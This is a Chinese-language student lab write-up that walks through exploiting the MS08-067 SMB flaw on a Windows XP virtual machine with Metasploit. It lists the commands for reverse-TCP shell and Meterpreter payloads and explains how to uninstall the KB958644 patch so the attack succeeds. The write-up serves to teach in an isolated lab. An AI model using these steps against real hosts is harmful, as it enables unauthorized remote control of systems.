MS08_067漏洞滲透攻擊實踐


MS08_067漏洞滲透攻擊實踐

實驗前准備

1、兩台虛擬機,其中一台為kali,一台為windows xp sp3(英文版)。

2、在VMware中設置兩台虛擬機網絡為NAT模式,自動分配IP地址,之后兩台虛擬機就可以直接ping通。如下圖:

如果ping不通,一般是ip地址不在同一個網段上,需要重新設置xp的ip地址,打開:控制面板->網絡連接->右擊本地連接選擇屬性->選擇internet協議(TCP/IP)->屬性,就可以編輯ip地址了。例如:kali ip是192.168.241.131,xp ip設置為:192.168.241.130。前三位一樣,最后一位隨便設置。

MS08_067遠程漏洞攻擊實踐:Shell

1、在kali終端中開啟msfconsole。

2、輸入命令search ms08_067,會顯示出找到的滲透模塊,如下圖所示:

3、輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模塊的使用。

4、輸入命令show payload會顯示出有效的攻擊載荷,如下圖所示,我們找到一個shell_reverse_tcp。

5、命令show targets會顯示出可以被攻擊的靶機的操作系統型號,如下圖所示:

6、使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。

7、輸入命令show options顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。

8、輸入命令

set LHOST "kali Ip" 

set RHOST "Win xp Ip"

並使用命令show options再次查看payload狀態。

9、輸入命令exploit開始攻擊,如下圖所示是正常攻擊成功結果。

在kali上執行ipconfig/all得到如下圖所示:

在win xp上執行同樣的命令,如下圖所示:

MS08_067遠程漏洞攻擊實踐:meterpreter

1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,進入ms08_067漏洞模塊。

2、設置payload:set payload windows/meterpreter/reverse_tcp

3、show options ,查看需要設置的ip地址,如下圖所示,是已經設置好的

4、成功攻擊結果:

5、執行ifconfig,查看靶機地址:

6、ps查看進程:

7、meterpreter轉shell:

實驗中遇到的問題

1、在做實驗的時候用老師的xp系統作為靶機,但是在exploit的時候顯示如下:no session was created。

2、手動設置一個set session 1,結果還是不成功。

3、在exploit前,使用check查看靶機狀態,返回以下信息,表明目標主機是安全的,不能被攻擊。

4、網上查到可以卸載ms08_067的補丁,即卸載KB958644,文件路徑:c:/windows找到KB958644(這是個隱藏文件),打開卸載exe程序,如下:

5、重啟后,還是不能成功,最后找了一個英文版的win xp sp 3 ,才成功完成。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM